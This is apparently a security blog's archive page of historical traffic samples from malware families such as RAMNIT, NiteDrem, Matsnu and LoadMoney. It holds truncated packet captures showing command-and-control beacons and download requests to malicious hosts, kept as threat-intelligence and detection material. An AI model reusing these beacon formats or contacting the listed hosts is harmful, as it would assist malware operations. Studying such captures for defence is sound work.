Category Archives: APT Samples

APT – Advanced Persistent Threat – RAMNIT – Historical Traffic Sample

2011-07-29 23:09:35.899406 IP 68.87.73.246.53 > 172.29.0.116.1026: 23951 1/0/0 A 207.223.0.140 (50) E@.N..@.9…DWI….t.5…:..]…………star-trakers.com………………… 2011-07-29 23:09:35.899748 IP 172.29.0.116.1488 > 207.223.0.140.443: Flags [S], seq 867836568, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0*.@…S,…t……..3.”…..p….T………. 2011-07-29 23:09:38.820452 IP 172.29.0.116.1488 > 207.223.0.140.443: Flags [S], seq 867836568, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0*.@…S+…t……..3.”…..p….T………. 2011-07-29 23:09:44.728939 IP 172.29.0.116.1488 > 207.223.0.140.443: Flags… Read More »

APT – Advanced Persistent Threat – NiteDrem – Historical Traffic Sample

2013-08-19 13:49:42.584965 IP 172.16.148.184.1034 > 103.20.193.157.99: Flags [P.], seq 1:148, ack 1, win 65535, length 147 E….#@………g…. .c.yII:…P…….GET /down.asp?action=install&u=cpmcpm&p=2366A64BAA384EA6AB9CEF73E8E2BE12&t=7393 HTTP/1.1 User-Agent: fucking Host: bucks.onepiecedream.com:99     2013-08-19 13:49:42.628555 IP 103.20.193.157.99 > 172.16.148.184.1034: Flags [.], ack 148, win 8760, length 0 E..(….?..Bg……..c. :….yI.P.”8.^.. 2013-08-19 13:49:42.890363 IP 103.20.193.157.99 > 172.16.148.184.1034: Flags [P.], seq 1:245, ack 148, win… Read More »

APT – Advanced Persistent Threat – MatsnuMBRWiping – Historical Traffic Sample

2013-02-03 20:32:35.365905 IP 172.16.253.132.1046 > 46.165.248.117.80: Flags [P.], seq 1:316, ack 1, win 64240, length 315 E..c.+@…(……..u…P..R…..P….<..GET /inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458&stat=0&ver=2000803&loc=0x0409&os=Windows%20XP HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: nvufvwieg.com Connection: Keep-Alive Cache-Control: no-cache     2013-02-03 20:32:35.366029 IP 46.165.248.117.80 > 172.16.253.132.1046: Flags [.], ack 316, win 64240, length 0 E..(……~1…u…..P……..S=P………….… Read More »

APT – Advanced Persistent Threat – LoadMoney – Historical Traffic Sample

1970-01-01 -4:-59:-43.2109 IP 10.0.2.15.1049 > 78.140.165.153.80: Flags [P.], seq 1:100, ack 1, win 64240, length 99 E….Q@….. …N……P7…….P…^M…GET /get_xml?file_id=25227372 HTTP/1.1 Accept: */* User-Agent: tiny-dl/nix Host: takeinfo.ru     1970-01-01 -4:-59:-43.2110 IP 78.140.165.153.80 > 10.0.2.15.1049: Flags [.], ack 100, win 65535, length 0 E..(….@.z.N… ….P……7..!P……. 1970-01-01 -4:-59:-43.2490 IP 78.140.165.153.80 > 10.0.2.15.1049: Flags [.], seq 1:1421, ack… Read More »

APT – Advanced Persistent Threat – Lader Downloader – Historical Traffic Sample

2013-09-20 07:23:02.590312 IP 172.16.98.8.1034 > 174.140.169.145.80: Flags [P.], seq 1:408, ack 1, win 65535, length 407 E….#@…….b…… .P023.%…P… …POST /forum/viewtopic.php HTTP/1.0 Host: louvozza.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 275 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR… Read More »
